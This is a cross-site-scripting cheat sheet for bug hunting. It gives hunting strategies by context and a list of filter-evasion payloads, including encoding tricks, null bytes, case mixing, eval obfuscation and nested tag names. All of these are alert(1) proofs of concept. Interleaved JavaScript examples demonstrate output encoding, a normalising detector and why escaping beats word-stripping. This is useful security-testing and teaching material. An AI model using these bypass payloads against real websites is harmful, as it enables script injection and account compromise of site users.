
XSS Cheat sheet

Contents

Active XSS hunting
  Attack strategy
Passive XSS hunting
  Attack strategy
Filter evasion

Active XSS hunting


Attack strategy
Types of XSS

Value reflection
  Reflected XSS: the value is not stored in the database; it is reflected from a GET or POST parameter.
  Stored XSS: the value is stored in the database and fetched from there.
  DOM XSS: the value is put into a DOM sink.

Test objectives
  Reflected XSS: identify where a value is reflected into the response, assess the input it accepts and see whether we can get past any filters.
  Stored XSS: identify where a value is stored in the DB and reflected back onto the page, assess the input it accepts and see whether we can get past any filters.
  DOM XSS: identify where a value is put into a DOM sink and reflected back onto the page, assess the input it accepts and see whether we can get past any filters.

Step 1
  Reflected XSS: detect input vectors by testing ALL parameters.
  Stored XSS: detect input vectors by testing ALL parameters.
  DOM XSS: static code review works best for this.



Step 2
  Reflected XSS: analyse the results depending on the context.
  Stored XSS: analyse the results depending on the context.
  DOM XSS: find the DOM sinks by entering a random value and looking in the developer console; try to find where the value is reflected and in which context.

Step 3
  Reflected XSS: check the impact of the attack vector.
  Stored XSS: check the impact of the attack vector.
  DOM XSS: the tester MUST use the developer console rather than the page source, as the page source will not show DOM elements.


Passive XSS hunting


Attack strategy
Enter "'`><u>Rat was here<img src=x> into every field that you see:

Name, last name, address, ... at registration

Names and content of every object you create

EVERYWHERE

If you encounter a value that's reflected, determine the context.

Contexts

JavaScript context
  Attack vector: '"`
  Breaks: JavaScript functions
  Exploit: try to insert our own JS code
  Example: '); alert(); —

HTML context
  Attack vector: <u>Rat was here + <img src=x>
  Breaks: nothing; the value is reflected into the HTML without sanitisation, which allows our own tags
  Exploit: add event handlers to tags
  Example: <img src=x onerror=alert()>

HTML tag attribute context
  Attack vector: "'`>
  Breaks: the HTML tag attribute, such as value="..." of an <input> tag
  Exploit: insert a JS event handler or JS code into the tag
  Example: ' alert(); '
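The three contexts above each need a different output encoding, and the probe string from the passive-hunting section is a convenient way to see why. The following is an added example, not code from the cheat sheet: it renders the probe into a body, an attribute and a JavaScript-string template, first reflected as-is (the situation the sheet is hunting for) and then through a context-specific encoder. All names (encodeForHtml, encodeForAttribute, encodeForJsString, the render and check helpers) are this example's own, not a library API.

```javascript
// Added example, not from the cheat sheet: the sheet's probe string rendered
// into the three contexts of the table above, once reflected as-is and once
// through a context-specific encoder. All names here are this example's own.

// The probe the sheet tells you to type into every field (constructed input).
const PROBE = '"\'`><u>Rat was here<img src=x>';

// HTML body context: every character that can open a tag, an entity or end a
// quoted attribute becomes a numeric character reference.
function encodeForHtml(value) {
  return String(value).replace(/[&<>"'`]/g, c => '&#' + c.charCodeAt(0) + ';');
}

// Attribute context: the same set is sufficient as long as the template always
// quotes the attribute; an unquoted attribute also ends at whitespace, which
// this encoder leaves alone.
function encodeForAttribute(value) {
  return encodeForHtml(value);
}

// JS string-literal context: \xHH / \uHHHH-escape everything that is not
// alphanumeric, so quotes, backticks, backslashes and "</script" never reach
// the JavaScript or HTML parser as syntax.
function encodeForJsString(value) {
  return String(value).replace(/[^A-Za-z0-9]/g, c => {
    const code = c.charCodeAt(0);
    return code < 0x100
      ? '\\x' + code.toString(16).padStart(2, '0')
      : '\\u' + code.toString(16).padStart(4, '0');
  });
}

// One template per context. safe=false reproduces the reflection the sheet is
// hunting for; safe=true applies the matching encoder.
function renderHtml(value, safe) {
  return '<p>Hello ' + (safe ? encodeForHtml(value) : value) + '</p>';
}
function renderAttribute(value, safe) {
  return '<input type="text" name="name" value="' +
    (safe ? encodeForAttribute(value) : value) + '">';
}
function renderJs(value, safe) {
  return "<script>var name = '" + (safe ? encodeForJsString(value) : value) +
    "';</script>";
}

// Check helpers so the difference is visible without a browser.
// HTML context: count the sheet's tell-tale <u> / <img> tags in the output.
function injectedTags(markup) {
  return (markup.match(/<(u|img)\b/g) || []).length;
}
// Attribute context: the template itself holds six double quotes; a seventh
// means the probe closed value="..." and started writing attributes.
function countChar(markup, ch) {
  return markup.split(ch).length - 1;
}
// JS context: pull the literal out of the <script> and let the JS parser
// judge it. Returns the literal's value, or null if the probe broke the syntax.
function evalJsLiteral(markup) {
  const literal = /var name = (.*);<\/script>/.exec(markup)[1];
  try {
    return new Function('return ' + literal)();
  } catch (e) {
    return null;
  }
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const safe of [false, true]) {
    console.log(safe ? '--- encoded ---' : '--- reflected as-is ---');
    console.log(renderHtml(PROBE, safe));
    console.log(renderAttribute(PROBE, safe));
    console.log(renderJs(PROBE, safe));
  }
}
```

Run it with `node` to see the two renderings side by side. The point of the check helpers is that each context has its own notion of "broke out": new tags in the body, an extra quote in the attribute template, a syntax error in the script block. An encoder for one context does nothing for another, which is why the sheet asks you to determine the context before choosing a payload and why the fix is chosen per context as well.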

Filter evasion

Techniques

Basic modifications
  Tags:
    <script>alert(1)</script>
    <script >alert(1)</script>   (whitespace before the >)
    Encoded tabs/newlines/CR:
    <script&#9>alert(1)</script>
    <script&#10>alert(1)</script>
    <script&#13>alert(1)</script>
    Capital letters:
    <ScRipT>alert(1)</sCriPt>
    Adding null bytes:
    <%00script>alert(1)</script>
    <script>al%00ert(1)</script>
  Notes: doing basic things like adding spaces and encoding tabs, newlines and carriage returns can do a lot already.



Attributes and tags
  Tags:
    <input type="text" name="input" value="hello">
    <input type="text" name="input" value="><script>alert(1)</script>
    <randomtag type="text" name="input" value="><script>alert(1)</script>
    <input/type="text" name="input" value="><script>alert(1)</script>
    <input&#9type="text" name="input" value="><script>alert(1)</script>
    <input&#10type="text" name="input" value="><script>alert(1)</script>
    <input&#13type="text" name="input" value="><script>alert(1)</script>
    <input/'type="text" name="input" value="><script>alert(1)</script>
    <iNpUt type="text" name="input" value="><script>alert(1)</script>
    <%00input type="text" name="input" value="><script>alert(1)</script>
    <inp%00ut type="text" name="input" value="><script>alert(1)</script>
    <input t%00ype="text" name="input" value="><script>alert(1)</script>
    <input type="text" name="input" value="><script>a%00lert(1)</script>
  Notes: we can do the same basic modifications to attribute tags and add things like null bytes.
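What the two rows above have in common is that a filter matching the literal string `<script>` sees none of the variants, while the browser sees the same tag every time. The following is an added example, not code from the cheat sheet: it runs an exact-string blocklist and a normalising detector over the sheet's own payloads and over a few constructed benign strings, so the gap is measurable. All names (naiveBlocklist, normalize, detectTag, summarize) are this example's own.

```javascript
// Added example, not from the cheat sheet: a "<script>" blocklist measured
// against the variants in the two rows above, next to a detector that first
// normalises the input the way the URL and HTML layers will. All names
// (naiveBlocklist, normalize, detectTag, summarize) are this example's own.

// Payloads copied from the sheet's "Basic modifications" and "Attributes and
// tags" rows. The second entry carries a real tab character; the sheet writes
// the same thing as an encoded tab (&#9).
const SAMPLES = [
  '<script>alert(1)</script>',
  '<script\t>alert(1)</script>',
  '<script&#9>alert(1)</script>',
  '<script&#10>alert(1)</script>',
  '<script&#13>alert(1)</script>',
  '<ScRipT>alert(1)</sCriPt>',
  '<%00script>alert(1)</script>',
  '<script>al%00ert(1)</script>',
  '<input/type="text" name="input" value="><script>alert(1)</script>',
  '<input&#10type="text" name="input" value="><script>alert(1)</script>',
  '<inp%00ut type="text" name="input" value="><script>alert(1)</script>',
];

// Constructed benign inputs that a detector must leave alone.
const BENIGN = ['Rat was here', 'script kiddie', '5 < 6 and 7 > 3', 'a&b'];

// The kind of filter the sheet is getting around: an exact-string check.
function naiveBlocklist(input) {
  return input.includes('<script>');
}

// Undo the layers of encoding between the tester's keyboard and the HTML
// parser: percent-encoding, numeric character references (with or without
// the ";"), NUL bytes that many back ends drop silently, and case.
function normalize(input) {
  let s = String(input);
  s = s.replace(/%([0-9a-f]{2})/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
  s = s.replace(/&#(\d+);?/g, (_, d) => String.fromCharCode(parseInt(d, 10)));
  s = s.replace(/&#x([0-9a-f]+);?/gi, (_, h) => String.fromCharCode(parseInt(h, 16)));
  s = s.replace(/\0/g, '');
  return s.toLowerCase();
}

// After normalisation a tag is "<", optional whitespace or "/", the name, and
// then something that cannot continue the name (whitespace, "/" or ">").
function detectTag(input, tagName) {
  const re = new RegExp('<[\\s/]*' + tagName + '(?=[\\s/>])');
  return re.test(normalize(input));
}

function detectScriptTag(input) {
  return detectTag(input, 'script');
}

// How many of the sheet's payloads each approach flags, and how many benign
// strings the normalising detector wrongly flags.
function summarize() {
  return {
    naive: SAMPLES.filter(naiveBlocklist).length,
    normalized: SAMPLES.filter(detectScriptTag).length,
    falsePositives: BENIGN.filter(detectScriptTag).length,
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  for (const s of SAMPLES) {
    console.log(naiveBlocklist(s), detectScriptTag(s), JSON.stringify(s));
  }
  console.log(summarize()); // { naive: 5, normalized: 11, falsePositives: 0 }
}
```

Treat the normalising detector as a logging and alerting aid, not as the fix: it decodes only the layers listed in its comment, and the eval() row further down shows payloads that no string pattern will recognise once the browser has parsed them. The defence that does not depend on guessing the attacker's encoding is context-aware output encoding of the reflected value.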

Event handlers
  Tags: try all different event handlers.
  Notes: use Burp Intruder; select the event handler that's blocked and use Burp Suite's cheat sheet to test all event handlers: https://portswigger.net/web-security/cross-site-scripting/cheat-sheet

Delimiters and brackets
  Tags:
    <img onerror="alert(1)"src=x>
    <img onerror='alert(1)'src=x>
    URL encoding:
    <img onerror=&#34alert(1)&#34src=x>
    <img onerror=&#39alert(1)&#39src=x>
    Backticks:
    <img onerror=`alert(1)`src=x>
    Encoded backticks:
    <img onerror=&#96alert(1)&#96src=x>
  Notes: sometimes we can play with things like delimiters by encoding them if they are blocked.



Delimiters and brackets 2
  Tags:
    Double use of delimiters:
    <<script>alert(1)//<</script>
    Unknown delimiters:
    «input onsubmit=alert(1)»
    Encoded:
    &#174input onsubmit=alert(1)&#175

Eval()
  Tags:
    <script>eval('a\u006cert(1)')</script>
    <script>eval('al' + 'ert(1)')</script>
    <script>eval(String.fromCharCode(97, 108, 101, 114, 116, 40, 49, 41))</script>
  Notes: we can also make use of the eval() function in JS to obfuscate some strings so they won't be filtered.

Using filtered words in filtered words
  Tags: if "script" is filtered, <scrscriptipt> might become <script>
  Notes: This helped me find many bounties 😂
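The `<scrscriptipt>` trick works against a sanitiser that deletes a forbidden word once and trusts the result. The following is an added example, not code from the cheat sheet: it shows the single-pass removal reassembling the tag, a fixed-point version that keeps deleting until nothing changes (and what that costs in collateral damage), and escaping as the alternative that has nothing left to reassemble. All names (stripOnce, stripToFixedPoint, escapeHtml, demo) are this example's own, and the two-level nested payload is constructed here, not taken from the sheet.

```javascript
// Added example, not from the cheat sheet: why "<scrscriptipt>" in the row
// above turns back into "<script>". A sanitiser that deletes the word "script"
// in a single pass reassembles the tag from the pieces; iterating to a fixed
// point does not, but it still mangles harmless text, which is why escaping
// beats deleting. Names (stripOnce, stripToFixedPoint, escapeHtml, demo) are
// this example's own.

// The sheet's trick, plus a constructed two-level variant.
const NESTED_ONCE = '<scrscriptipt>alert(1)</scrscriptipt>';
const NESTED_TWICE = '<scrscrscriptiptipt>alert(1)</scrscrscriptiptipt>';

// Single-pass removal: the characters on either side of the deleted word
// join up, so one nesting level survives as a complete "<script>".
function stripOnce(input) {
  return String(input).replace(/script/gi, '');
}

// Repeat until nothing changes. This defeats the nesting trick at any depth,
// at the cost of silently deleting legitimate text as well.
function stripToFixedPoint(input) {
  let previous;
  let current = String(input);
  do {
    previous = current;
    current = previous.replace(/script/gi, '');
  } while (current !== previous);
  return current;
}

// The alternative: leave the text intact and make it inert for the parser,
// so a second pass has nothing to reassemble.
function escapeHtml(input) {
  return String(input).replace(/[&<>"']/g, c => '&#' + c.charCodeAt(0) + ';');
}

// Every outcome in one place so it can be printed or asserted on.
function demo() {
  return {
    once: stripOnce(NESTED_ONCE),                         // '<script>alert(1)</script>'
    onceOnDeeper: stripOnce(NESTED_TWICE),                // '<scrscriptipt>alert(1)</scrscriptipt>'
    fixedPoint: stripToFixedPoint(NESTED_TWICE),          // '<>alert(1)</>'
    collateral: stripToFixedPoint('JavaScript tutorial'), // 'Java tutorial'
    escaped: escapeHtml(NESTED_ONCE),
  };
}

if (typeof require !== 'undefined' && require.main === module) {
  console.log(demo());
}
```

The `collateral` entry is the reason the fixed-point loop is not an acceptable fix either: a sanitiser that rewrites "JavaScript tutorial" to "Java tutorial" is deleting user content, and the same applies to every other word on the blocklist. Escaping keeps the text and removes the ambiguity, so the iteration problem never arises.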

Use your imagination

